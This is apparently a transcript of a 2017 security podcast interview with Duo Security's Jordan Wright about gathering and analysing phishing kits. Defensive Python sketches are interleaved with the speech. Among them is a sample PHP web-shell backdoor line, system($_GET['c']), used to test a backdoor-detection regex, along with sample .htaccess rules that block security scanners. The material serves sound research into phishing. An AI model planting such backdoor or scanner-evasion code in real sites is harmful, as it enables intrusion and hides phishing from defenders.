CyberWire Daily - Exploring Phishing Kits with Duo Security's Jordan Wright. [Research Saturday]
Episode Date: November 4, 2017
In this episode of the CyberWire’s Research Saturday we are joined by Jordan Wright, Senior Research and Development Engineer at Duo Security. He’s the author of the research report, “Phish in a... Barrel,” which describes his work gathering and examining thousands of phishing kits from around the web.
Transcript
You're listening to the CyberWire Network, powered by N2K.
Hello, everyone, and welcome to the CyberWire's Research Saturday.
I'm Dave Bittner, and this is our weekly conversation with researchers and
analysts tracking down threats and vulnerabilities and solving some of the hard problems of
protecting ourselves in a rapidly evolving cyberspace. Thanks for joining us.
So I have quite a bit of a background in terms of phishing.
It's always been a hobby of mine and an area of interest.
Jordan Wright is a senior research and development engineer at Duo Security.
He's the author of the research report, Phish in a Barrel.
My first exposure to phishing kits was a couple years ago,
whenever I was doing some just high-level independent research around phishing in general,
and I came across a phishing kit almost by accident.
I found the kit, downloaded it, analyzed it, and realized maybe this is something that could be looked at at scale.
You know, if we did this for thousands of phishing URLs, not just a one-off kind of approach.
But as time goes, you know, it always was kind of put on the back burner in terms of
projects.
And whenever I was looking at areas to investigate for Duo, this came up and really just struck
an area of interest.
I knew this was something that I wanted to look at.
We had the resources and time to look at it, which resulted
in this project.
So before we dig into the actual research, can you give us a sense for the
landscape? I mean, what is the state of phishing these days?
Sure. Phishing is absolutely on the
rise. There was a report given out quarterly during 2016. There's an organization called the Anti-Phishing Working Group,
and they consist of multiple organizations who all come together to share research, share data, and try to combat phishing as a whole.
And so they release quarterly reports that indicate the state of phishing and how often phishing sites are being seen.
And what we found in 2016 is that the number of unique phishing sites seen in a given quarter broke the record. And we broke that record twice in 2016,
first in Q1 and then in Q2. To give you an idea of the kind of scale that we're talking about,
in Q2, there were over 460,000 unique phishing sites seen just in that quarter.
To kind of break that down into a different number, that's over 5,000 unique phishing sites seen per day.
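The per-day figure can be checked with quick arithmetic. This is only a rough sketch: it assumes Q2 means April through June (91 days) and uses the rounded "over 460,000" figure from the interview, so the result is a lower bound and not an exact count.

```python
# Rough check of the per-day figure quoted in the interview.
# Assumption: Q2 covers April, May, and June (30 + 31 + 30 days).
SITES_IN_Q2 = 460_000        # "over 460,000" unique phishing sites
DAYS_IN_Q2 = 30 + 31 + 30    # 91 days

sites_per_day = SITES_IN_Q2 / DAYS_IN_Q2
print(f"roughly {sites_per_day:,.0f} unique phishing sites per day")
```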
It's clear that we need to start thinking in terms of at-scale approaches to mitigate phishing.
We need to analyze this as a bigger problem than just trying to hit one-off phishing sites and try to keep up and
play whack-a-mole every day. So these numbers are not only growing, but they're growing to a level
where we're having to start taking different approaches. Take us through how a typical
phishing kit works. To give a bit of background on why phishing kits are even important at all,
we have to remember this is a business. For attackers, like any business person, their goal is to maximize the return on investment. And so the
entire idea around phishing kits is how can I make my phishing campaigns as efficient and cheap as
possible? Because if I can do that and I can start harvesting credentials, then my return on
investment is higher. And so what they'll do is they'll start by figuring out what site do I want to spoof. Let's say it's Facebook or Office
365 or Gmail, you name it. They'll figure out the site that they want to clone. They'll download
local copies of all that site's resources. This includes the HTML, the images, the style sheets,
everything that they need to host a
local copy of that website. And then they'll change the login form to point to a script that they
control. Typically, this is a short PHP script that does nothing more than collect those credentials.
And it almost ironically emails them to the attacker saying, I received these credentials
from this phishing
campaign. After an attacker has all these resources and this script, they'll bundle these up together
into a zip file, and then they'll figure out where do I want to host my next phishing campaign.
But this zip file is the phishing kit. This has everything they need to run the campaign.
So they'll look out and they'll find, let's say, typically a compromised CMS instance, like a WordPress instance, and they'll exploit an out-of-date plugin or an out-of-date theme to get access to upload their phishing kit onto that server.
So they'll upload the zip file, they'll extract the files, and then they have a working phishing site on this hacked website.
From there, they'll send out emails pointing to their new website, and they're off to the races.
Now, the hacked website that they load their files onto, would the person running that site
even be aware that this phishing kit might be living on their site?
It really depends. It depends a lot on the monitoring that they have enabled. Traditionally,
what would likely happen is after phishing campaigns and after phishing emails are starting
to be sent out, the abuse reports would start rolling in. Security companies would start
detecting these sites and trying to shut them down. They'll send notices to the registrar,
who in turn will let the person running and operating that website know so that they can
try to go and clean up those efforts.
And the people who've fallen victim to this, they might not even know that they've given up their credentials.
You're absolutely right.
And this is where phishing kits can be really sneaky.
So after I've put in my credentials, the last trick up a phishing kit's sleeve is that it's going to redirect me to the legitimate website.
Because at this point, it has my credentials.
It doesn't need anything else.
And so by redirecting me to the legitimate login form,
as a user, I just feel, I guess I put in my credentials wrong.
I guess I must have done something different or the site didn't work.
There was an error.
But either way, now if I look up in the address bar or the URL bar,
I see the legitimate website.
I don't think anything happened.
So there's not even any sense that something's gone wrong and I have a good feeling I've gotten where I wanted to go.
And meanwhile, my credentials have been sent off to the bad folks.
Exactly. You know, this catches people just trying to live their daily lives, trying to do daily business.
And so they would just chalk this up to say, I guess something went wrong. I'll log in again and move forward.
So let's go through, how did you start tracking down these phishing kits?
So it all starts with knowing what to look for. And this came from my previous research into this
individual phishing kit, which is knowing some different tricks and kind of relying on attackers
being lazy and leaving these kits behind. Because that's really the whole reason this
research was possible, is that whenever these files are extracted, they don't always delete
the original zip file. And that's what we're targeting. If we can download that zip file,
we can analyze the code inside of it, including the email address
that these credentials are being sent to, as well as what information is being collected.
And so we started by trying to figure out what are the best ways that we can track down this zip
file. And there are two ways that we came across. The first is looking for what we call directory
indexes or directory listings. In web servers,
it's commonly the case that they'll say, if you request a URL that ends with a slash,
so indicating a folder, I would know what page to serve you. Say that's index.html or index.php,
because I'm presuming that that file is going to be present in every folder.
If it's not, which is commonly the case with these phishing kits,
web servers can fall back and say,
I'm just going to give you a listing of all of the contents in the directory.
This includes all the file names that I have in this folder.
One of these file names would be the zip file.
So that makes it really
clear and easy for us to say there's a phishing kit, even if it's not the same name as the
extracted contents. You know, let's say they called their phishing kit office365phishing.zip
and the folder is just in the URL, you would just see office365. That's a really quick way for us to for sure get phishing
kits if they're left on the server. But directory indexing and directory listing is configurable,
and it's not always available. In our research, we found that it was available about 23% of the time.
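The directory-listing check described here can be sketched in a few lines of Python. This is an illustration under stated assumptions, not the code from the report: the host name, the folder names, and the sample HTML are hypothetical, and the sketch only parses a listing page that has already been fetched.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin


class ZipLinkParser(HTMLParser):
    """Collect href values that end in .zip from a directory listing page."""

    def __init__(self):
        super().__init__()
        self.zip_links = []

    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return
        for name, value in attrs:
            if name == "href" and value and value.lower().endswith(".zip"):
                self.zip_links.append(value)


def find_kits_in_listing(base_url, html):
    """Return absolute URLs of the .zip files linked from a listing page."""
    parser = ZipLinkParser()
    parser.feed(html)
    return [urljoin(base_url, link) for link in parser.zip_links]


# Hypothetical listing for a folder that has no index.html or index.php.
sample_listing = """
<html><head><title>Index of /files</title></head><body>
<h1>Index of /files</h1>
<a href="../">Parent Directory</a>
<a href="office365/">office365/</a>
<a href="office365phishing.zip">office365phishing.zip</a>
</body></html>
"""

kits = find_kits_in_listing("http://compromised.example/files/", sample_listing)
print(kits)
```

Matching on the `.zip` extension alone means the archive is found even when its name differs from the extracted folder, which is the case the interview highlights.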
So it's a good amount, but it's not 100% reliable. And so we had to look at another method, which is, again, relying on
attackers being lazy in naming the zip file the same name as the extracted folder. So if they
named their zip file office365.zip, and then they unzip those files into office365, the folder,
all we have to do is just work our way up the URL,
replacing every slash with .zip. And then if that phishing kit is there, we can download it.
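A minimal sketch of that "work our way up the URL" step, assuming the final path segment is a file name when it contains a dot and the path does not end in a slash. The function name and the example URL are hypothetical; the sketch only builds the candidate URLs and does not request them.

```python
from urllib.parse import urlsplit, urlunsplit


def candidate_kit_urls(phishing_url):
    """Walk up the URL path, turning each folder into a '<folder>.zip' guess."""
    parts = urlsplit(phishing_url)
    segments = [s for s in parts.path.split("/") if s]
    # Heuristic: drop a trailing file name such as login.php, keep folders only.
    if segments and "." in segments[-1] and not parts.path.endswith("/"):
        segments = segments[:-1]
    candidates = []
    # Deepest folder first, then each parent folder in turn.
    for depth in range(len(segments), 0, -1):
        path = "/" + "/".join(segments[:depth]) + ".zip"
        candidates.append(urlunsplit((parts.scheme, parts.netloc, path, "", "")))
    return candidates


guesses = candidate_kit_urls(
    "http://compromised.example/wp-content/office365/login.php"
)
for url in guesses:
    print(url)
```

Each guess would then be requested in turn; a successful response with zip content suggests the attacker left the archive behind.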
And so you gathered up quite a number of URLs. Take us through that part.
We did. So we sourced our URLs from two different places. These are both community-driven feeds where anyone can go and submit a phishing URL
to these feeds,
which then in turn work with different security companies
to try to shut them down.
The first is called PhishTank,
and it's run by OpenDNS.
And the second is called OpenPhish.
So we took both of these feeds
and we watched them for a month.
And over the course of a month, we analyzed
over 66,000 phishing, or possibly phishing, URLs. I say possibly because anyone can upload any URL they
want. So it's not a guarantee that all of these are phishing, but a majority of the time they are.
So after we analyzed all 66,000 of these URLs, we downloaded over 3,200 unique phishing kits.
What's some of
the data that you were able to gather from all of those unique phishing kits?
That was the next step.
We have this huge corpus of data and we need to figure out what does it mean? What's the
significance? What can we learn from it? And this is where we started digging in. The first interesting thing that
we found was that attackers are pretty good at evading detection from
security companies, or at least are trying to. The way this works is that it's a cat and mouse game. Attackers will stand
up a new phishing site, they'll send out emails, and they know that security companies are always
looking to locate their phishing site and to shut it down.
And so it's to their advantage, remember, this is all return on investment for them, to try to keep their phishing site available and up as long as possible.
So there's a couple of things that they'll do to try to keep that level of persistence.
The first is that they'll use a file called an .htaccess file.
This is something that is specific to the Apache web server,
and it's a file that lets administrators tell Apache,
here are the connections that I want you to allow or deny.
And you can do this based on any number
of interesting attributes like the user agent
or the IP address or the domain
that they're claiming to come from. And so attackers will use these .htaccess
files to put in the information about security companies. They'll say, I want
you to deny connections from these IP addresses, which are known to belong to
this security company, or I want you to deny connections from this user agent,
which is known to be a crawler from this other company.
And by doing this, they can try to hide a little bit.
They can try to evade this detection,
where if a company is going and looking for these websites,
if they're using the infrastructure that this .htaccess file is designed to block,
they wouldn't see the site.
It would be kind of hidden from view.
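For an analyst, the useful part of such a file is the list of sources it tries to block. The sketch below pulls those out of .htaccess text. It assumes the rules use Apache's `Deny from`, `SetEnvIf`/`SetEnvIfNoCase User-Agent`, or `RewriteCond %{HTTP_USER_AGENT}` directives; the sample rules and addresses are hypothetical (documentation ranges), not taken from the kits in the report.

```python
import re

# "deny from <ip-or-host> [<ip-or-host> ...]"
DENY_RE = re.compile(r"^\s*deny\s+from\s+(.+)$", re.IGNORECASE)
# User-agent patterns set via SetEnvIf(NoCase) or tested via RewriteCond.
UA_RE = re.compile(
    r"^\s*(?:SetEnvIf(?:NoCase)?\s+User-Agent|RewriteCond\s+%\{HTTP_USER_AGENT\})"
    r"\s+(\S+)",
    re.IGNORECASE,
)


def summarize_htaccess(text):
    """Return the IPs/hosts and user-agent patterns an .htaccess file blocks."""
    denied, agents = [], []
    for line in text.splitlines():
        if line.lstrip().startswith("#"):
            continue  # skip comments
        match = DENY_RE.match(line)
        if match:
            # "env=..." refers to a variable, not a network source.
            denied.extend(
                token for token in match.group(1).split()
                if not token.startswith("env=")
            )
            continue
        match = UA_RE.match(line)
        if match:
            agents.append(match.group(1).strip('"'))
    return {"denied_sources": denied, "blocked_user_agents": agents}


# Hypothetical sample in the style the interview describes.
sample_htaccess = """
# block known scanners
order allow,deny
allow from all
deny from 192.0.2.0/24
deny from 198.51.100.7 203.0.113.9
SetEnvIfNoCase User-Agent "examplecrawler" bad_bot
deny from env=bad_bot
RewriteCond %{HTTP_USER_AGENT} ^SecurityScanner [NC]
"""

summary = summarize_htaccess(sample_htaccess)
print(summary)
```

Comparing these summaries across kits is one way to spot the mix-and-match sharing of block lists between attackers.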
This was really common.
This was really prevalent in all the kits that we found.
And we found over 185 different unique .htaccess files.
So this shows that there's definitely a level of information sharing
between attackers.
They'll kind of piecemeal different, you know,
one piece of IP addresses from this file that I found, some user agents from this one, and they'll
kind of mix and match, but they're all doing the same thing. And this is the same technique and the
same idea that they'll use in a different way. So another evasion technique that they'll use
is creating PHP scripts, which do basically the same thing that the .htaccess files do.
And they're designed to block connections based on any number of HTTP request attributes. Again,
the user agent, IP address, you name it. But this is where things kind of got interesting.
As we're looking through these PHP scripts to try to see what it is that they're trying
to block or allow, we came across something really interesting, which is that we found
multiple PHP scripts that had a hidden backdoor.
This backdoor allows anyone, if you know what parameter to put on the end of the URL, to
execute whatever system command you want.
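A reviewer looking for this kind of backdoor could start with a simple pattern scan. The sketch below is a heuristic under stated assumptions, not the detection used in the report: it flags lines where a PHP command-execution or `eval` call receives a request parameter directly, and the sample script is a hypothetical stand-in for the blocking scripts described in the interview.

```python
import re

# Flag calls such as system($_GET['c']) where request input reaches a
# command-execution or eval function on the same statement.
BACKDOOR_RE = re.compile(
    r"\b(system|exec|passthru|shell_exec|popen|eval)\s*\(\s*[^;]*"
    r"\$_(GET|POST|REQUEST)\b",
    re.IGNORECASE,
)


def find_suspicious_lines(php_source):
    """Return (line_number, line) pairs that match the backdoor heuristic."""
    hits = []
    for number, line in enumerate(php_source.splitlines(), start=1):
        if BACKDOOR_RE.search(line):
            hits.append((number, line.strip()))
    return hits


# Hypothetical "blocker" script with an extra line that runs a URL parameter.
sample_php = """<?php
$ua = $_SERVER['HTTP_USER_AGENT'];
if (strpos($ua, 'bot') !== false) { header('HTTP/1.0 404 Not Found'); exit; }
if (isset($_GET['c'])) { system($_GET['c']); }
?>"""

hits = find_suspicious_lines(sample_php)
for number, line in hits:
    print(f"line {number}: {line}")
```

A regular expression like this misses obfuscated code (encoded strings, variable function names), so it is a first pass and not a guarantee that a kit is clean.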
So this kind of falls back on phishing being an economy.
In addition to attackers standing up their own campaigns,
there's an entire economy around sharing, selling, trading phishing kits between one another.
So one attacker may create a phishing kit and then trade or hand it off to any number of
other attackers for use in their own campaigns. But it seems like some enterprising attackers,
maybe people who wanted to get a little bit of access without really putting in the work,
decided to put these hidden backdoors into these files as a way to kind of maintain that
persistence, as a way to maintain that control
and still have access to servers that they didn't take any part in compromising in
the first place. These backdoors, we kind of expected to see a couple of them from previous
work that had looked at similar situations in the past. But what really surprised us was the scale
of the backdoors that we came across. The particular backdoor that you'll find in our report,
that unique string was seen over 200 times, indicating this is surprisingly common.
You know, these kits are being traded and used very frequently, but many of them are
backdoored, so anyone, including other attackers or security researchers or really
anyone who would like to access these hosts, can do so through these backdoors very, very easily.
Do you think with that many backdoors being out there that it's a matter of, I don't know,
almost a cost of doing business for the folks who are putting these out there? That, you know,
the stuff still works for them, but in exchange these backdoors allow other people to take
advantage of the work they've done?
That's a really good insight. That's absolutely possible.
You know, we have to remember that this is all about quantity, not quality. You know,
attackers know that their phishing sites will
be shut down relatively quickly. There's a lot of people looking for these and they're doing a very
good job of finding and shutting down these phishing sites. And so it may be the case that
attackers realize the trade-off of analyzing every file in their kit for any kind of backdoor.
Like you said, it may just not be
worth it. It may be a cost of doing business. It may just say, I'm here to get my credentials as
quickly as possible, and then I'm out. I'm going to go somewhere else.
You also discovered a lot of reuse with these kits.
Yes. After we analyzed the contents of the kits themselves, we wanted to figure out,
what does the landscape look like for these phishing kits? Where are they being used? We looked at two sets of problems. The first is,
can we identify unique phishing kits that are used in more than one place? Because this would
indicate the same attacker running multiple campaigns and compromising multiple hosts.
And we did. We found that in our month span, most of the phishing kits
that we came across were seen once. But 27% of the phishing kits that we found, about 900 of them,
were seen in more than one place. In fact, a couple of the phishing kits that we've seen
were found on more than 30 unique hosts, indicating that attackers had compromised
30 different web servers and ran 30 different campaigns
all in the course of a month, which is pretty active.
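Measuring reuse comes down to grouping sightings by kit and counting distinct hosts. The sketch below assumes each sighting is a (kit identifier, host) pair; the identifiers and host names are made up for illustration. As a sanity check on the quoted numbers, 27% of roughly 3,200 kits is about 864, consistent with "about 900".

```python
from collections import defaultdict


def reuse_summary(observations):
    """Group sightings by kit and report kits seen on more than one host."""
    hosts_by_kit = defaultdict(set)
    for kit_id, host in observations:
        hosts_by_kit[kit_id].add(host)
    reused = {kit: hosts for kit, hosts in hosts_by_kit.items() if len(hosts) > 1}
    share = len(reused) / len(hosts_by_kit) if hosts_by_kit else 0.0
    return reused, share


# Hypothetical sightings: kit "aaa" shows up on two different hosts.
observations = [
    ("aaa", "site-one.example"),
    ("aaa", "site-two.example"),
    ("bbb", "site-one.example"),
    ("ccc", "site-three.example"),
    ("ccc", "site-three.example"),  # same host twice counts once
    ("ddd", "site-four.example"),
]

reused, share = reuse_summary(observations)
print(sorted(reused), f"{share:.0%} of kits seen on more than one host")
```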
These are very active attackers,
constantly running new campaigns.
And so being able to track this reuse
gives really valuable insight to security researchers because
they can start tracking actors in different places using very simple techniques that we show in the
paper. The second problem, the second area that we wanted to map, and this is another area where
it gets really interesting, is can we track attackers across different phishing kits. So the way that we decided this phishing kit is unique
is that we took a hash of it, which means we shorten it down to a set of characters,
which guarantee that it's a unique identifier across our data set. So this means all of the
content in that kit, including the email address of the attacker where credentials
are being sent, is bundled into that hash. So if that email address or any other content changes,
that hash will be different. And so we took all these hashes, and then we also took it another
step further, and we extracted every email address we saw in the kits. And then we mapped all those out, which email addresses are found in which hashes,
which unique phishing kits.
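The hashing and email-mapping steps can be sketched as follows. The interview does not say which hash function was used, so SHA-256 here is an assumption, as are the helper names and the tiny in-memory sample kits with made-up addresses.

```python
import hashlib
import io
import re
import zipfile
from collections import defaultdict

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def kit_fingerprint(zip_bytes):
    """Hash the whole archive; any change to its contents changes the hash."""
    return hashlib.sha256(zip_bytes).hexdigest()


def emails_in_kit(zip_bytes):
    """Return every email address found in any file inside the archive."""
    found = set()
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        for name in archive.namelist():
            if name.endswith("/"):
                continue  # directory entry, nothing to read
            text = archive.read(name).decode("utf-8", errors="ignore")
            found.update(address.lower() for address in EMAIL_RE.findall(text))
    return found


def make_sample_kit(recipient):
    """Build a tiny hypothetical kit in memory for demonstration only."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        archive.writestr(
            "login.php",
            f'<?php $to = "{recipient}"; $headers = "From: kitmaker@example.org"; ?>',
        )
    return buffer.getvalue()


kit_a = make_sample_kit("dropbox-a@example.com")
kit_b = make_sample_kit("dropbox-b@example.com")

# Map each email address to the set of kit hashes it appears in.
kits_by_email = defaultdict(set)
for kit in (kit_a, kit_b):
    fingerprint = kit_fingerprint(kit)
    for email in emails_in_kit(kit):
        kits_by_email[email].add(fingerprint)

for email, hashes in sorted(kits_by_email.items()):
    print(email, "appears in", len(hashes), "kit(s)")
```

Because the recipient address is part of the hashed content, the two sample kits get different fingerprints even though the rest of the file is identical, which is why the shared address is what links them.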
And that's the map that people will find on, I think it's page 12,
where we talk about tracking actors across kits.
And here's kind of a, it gets even more interesting.
We talk about having an email address for where the credentials are being sent to,
but there's another kind of interesting part about it,
which is whenever attackers create these phishing kits,
they want to leave kind of a signing card.
They want to leave a note that says,
this person created this phishing kit almost to get credit for it.
A typical place that they'll put their email address
is as the from address. So whenever you send an email, it has to have a from address.
Well, the email containing the stolen credentials is generally going to be sent from an email
address that's the signing card for the person who made the kit. So what this means is that if
I create a phishing kit and I put my email address as that signing card,
I give it to another attacker.
They go and they run multiple campaigns.
Both my email address and that attacker's email address
will be associated through that phishing kit.
So we can take all of these email addresses,
both sender and recipient,
and all of these kits and we can map them out.
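The mapping described here can be sketched as two lookups keyed on the sender address. The sketch assumes the sender ("from") and recipient ("to") addresses have already been extracted per kit; the record layout, function name, and addresses are hypothetical.

```python
from collections import defaultdict


def map_actors(records):
    """Link each likely kit creator (sender) to kits and to kit users (recipients)."""
    kits_by_creator = defaultdict(set)
    users_by_creator = defaultdict(set)
    for kit_id, from_addr, to_addr in records:
        kits_by_creator[from_addr].add(kit_id)
        users_by_creator[from_addr].add(to_addr)
    return kits_by_creator, users_by_creator


# Hypothetical records: (kit identifier, sender address, recipient address).
records = [
    ("kit1", "maker@example.org", "user-a@example.com"),
    ("kit2", "maker@example.org", "user-b@example.com"),
    ("kit3", "other@example.org", "user-a@example.com"),
]

kits_by_creator, users_by_creator = map_actors(records)

# Rank likely creators by how many distinct kits carry their address.
ranking = sorted(kits_by_creator, key=lambda c: len(kits_by_creator[c]), reverse=True)
for creator in ranking:
    print(creator, len(kits_by_creator[creator]), sorted(users_by_creator[creator]))
```

A sender address that appears across many kits with many different recipients is the pattern the interview associates with a kit creator and not a single campaign operator.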
And then we result in an incredible landscape where we can see here's probably who created all these kits.
Here's all the kits that they're associated with.
And then here are the people using those kits.
And then here are the URLs those are being used at. So you can, at a glance,
see the entire ecosystem and the landscape of what phishing attacks are being launched and who's behind them.
And so being able to have that view of this ecosystem,
what kind of information were you able to gather from that?
One interesting finding that we came across was a single email address was found in more than 115 unique phishing kits. Now, this email address
was used, like we talked about, as that signing card, as that from address, which indicates that
this actor who created this kit distributed it to any number of people,
or they got their hands on it somehow and started using it.
But seeing this wide of a scale in such a short time frame
shows that the kits created by this alias are very common.
And the kits that we found weren't just, it wasn't just one kit for one service.
We found kits with this actor's email address for almost every service
provider, Gmail, Office 365, you name it. So it's not just one single attack vector.
The people creating these kits are making them for any number of different services
before they distribute them. And what else can you learn about the overall ecosystem? Is this
a situation where you have a handful of
kingpins who are then distributing the software to workers below them who are doing the dirty work,
or is it more distributed than that? Is there any sense for that sort of thing?
I'd say there's a healthy mix of both distributors, people who make either full
kits themselves or just components of them. Maybe they just make the credential stealing script
and then they distribute that and say,
you're gonna have to clone your own pages,
but you can use this script to send out the emails.
And then there's also the side of people
who are more DIY in terms of creating their own phishing kits.
The barrier to entry in this type of attack
is very, very low.
That's why it's so common, because it's easy and cheap to get into,
and it still yields incredible results in terms of the effectiveness of phishing in general.
So this landscape is still pretty distributed,
but it does have that healthy mix where we see both sides of the story.
For those who are trying to defend against these sorts of things, these phishing attacks, what advice do you have for them?
Absolutely. So this is an area that we're really excited about because we took all the code that
we use to run this experiment and we're open sourcing it. We're making it freely available
on GitHub for anyone to download it and try to replicate our results for their own organization.
They can put in phishing URLs that they're seeing against their own user base to try
to track down the phishing kits behind them.
And this gives admins a really good look at what information is being captured, as well
as who's behind the attack, where these credentials are being sent.
There's also the opportunity to partner up with different mail providers to where we can say, we've come across a phishing kit that's sending credentials to this
email address. You may wish to shut this down as an attacker's account. So by having this
information, we can start to have a much more full and rich incident response process that lets us
take active measures on these phishing attacks as they occur.
Is there the possibility of automating the response to these sorts of things?
That would be kind of taking this research to the next step, which is now that we have the ability
to download this data in bulk and almost in a streaming fashion, could we somehow develop
automated measures to respond to the
emails that we find, to the phishing URLs that we find? There's a pretty good amount of automation
being built in to respond to phishing URLs that are found. So these would be threat feeds that
hook into popular products. Or a really good example is Google's Safe Browsing, which is
built into the Google Chrome web browser, where as soon as they know about a confirmed phishing site, they'll add that to a global block list where whenever you try to navigate to that website, Chrome will tell you this is a known phishing site.
You may be in a phishing attempt.
You may wish to go somewhere else at this point, which is a really effective way to get widespread protection
for consumers. And so the type of automation around phishing URLs is pretty strong, but there's
a level of automation that we could introduce around what do we do now that we know the
attackers behind these campaigns? Can we, you know, kind of like we mentioned earlier, can we work
directly with mail providers to send them the stream of email addresses if they don't already have them,
indicating that they were known to be found in fraudulent phishing campaigns,
where they could shut down those accounts even easier.
And once the account is shut down, any phishing credentials sent to that email address
wouldn't be collected and couldn't be used for further fraud.
So at Duo Security, you have some tools that help people test their ability to stand up to these phishing attacks. And through that, you all get some interesting statistics.
What can you share with us about that?
Sure. So we do have a free tool called Duo Insight. And what it does,
it allows organizations to test their own exposure to phishing completely
free.
So they can set up a campaign with popular phishing pretexts and see how likely it is
that their users would open, click, or even submit credentials to fake phishing sites.
And so we're always collecting anonymous statistics about how effective our phishing campaigns
are. And recent statistics show that
over the course of testing about 150,000 recipients, we find that 45% of recipients
open the email and 24% of recipients click the link. And at this point, it's important to take
a step back and say this could already be game over in some aspects because we hear about browser plug-in vulnerabilities like Flash or Java.
If those are out of date, it's easy for attackers to stand up malicious websites, which then compromise those plug-ins and install malware on the system.
And so even clicking the link can be pretty disastrous if we're not keeping our software up to date.
And taking that a step further, we found that 13% of recipients actually go to the next step and enter their credentials into the fake phishing site.
To kind of take that from a different angle, we found that 63% of campaigns were successful in capturing at least one credential.
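To put those percentages in absolute terms, here is a small worked calculation. It uses the rounded figures quoted in the interview ("about 150,000" recipients), so the counts are approximations. The conditional rates additionally assume that everyone who clicked had opened the email and everyone who submitted had clicked, which the interview does not state.

```python
# Rounded figures quoted in the interview.
RECIPIENTS = 150_000
PERCENT = {"opened": 45, "clicked": 24, "submitted": 13}

# Approximate head counts at each stage of the funnel.
approx_counts = {stage: RECIPIENTS * pct // 100 for stage, pct in PERCENT.items()}

# Conditional rates, assuming each stage is a subset of the previous one.
click_given_open = PERCENT["clicked"] / PERCENT["opened"]
submit_given_click = PERCENT["submitted"] / PERCENT["clicked"]

for stage, count in approx_counts.items():
    print(f"{stage}: about {count:,} recipients")
print(f"clicked, given opened: about {click_given_open:.0%}")
print(f"submitted, given clicked: about {submit_given_click:.0%}")
```

Under those assumptions, roughly half of the people who open the email click the link, and roughly half of those who click go on to enter credentials.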
So it shows that we talk about phishing being cheap, and it's getting even more effective with the use of phishing kits, but it's also very effective as
a practice. It's very effective as a measure to gain access to sensitive data or gain access to
accounts or systems if more than half of your phishing campaigns are going to receive a
credential. That's a really good return on investment. It shows why it's so important to really study and try to protect against the
phishing landscape.
What is your sense as to where we are in terms of facing this threat? Are we
gaining? Are the phishing people doing better than us, or are we doing a better job of shutting them
down?
I've seen, especially in recent years, there's been multiple companies
that have done incredible work at taking on phishing from a wider scale. I mentioned Google
Safe Browsing, and that's a perfect example of Google realizing that they can help protect a
large user base of anyone who uses Chrome against phishing sites very, very quickly. So we're making really good strides in terms of trying to protect against the increased
number of phishing sites that we see, but it's still safe to say that we have room to
grow.
We have room to continue doing better, to continue studying these attacks and trying
to figure out what protections can we put in place to try to thwart them.
But as a whole, you know, security companies
and browser makers are doing a good job of trying to combat a threat and take it head on,
which is always encouraging to see.
Our thanks to Jordan Wright from Duo Security for joining us.
You can find the complete report, Phish in a Barrel, in the blog section of the Duo Security website.
The CyberWire Research Saturday is proudly produced in Maryland out of the startup
studios of DataTribe, where they're co-building the next generation of cybersecurity teams and
technologies. Our amazing CyberWire team is Elliott Peltzman,
Puru Prakash, Stefan Vaziri, Kelsey Bond,
Tim Nodar, Joe Carrigan, Carole Theriault,
Ben Yelin, Nick Veliky, Gina Johnson, Bennett Moe,
Chris Russell, John Petrik, Jennifer Eiben, Rick Howard,
Peter Kilpe, and I'm Dave Bittner.
Thanks for listening.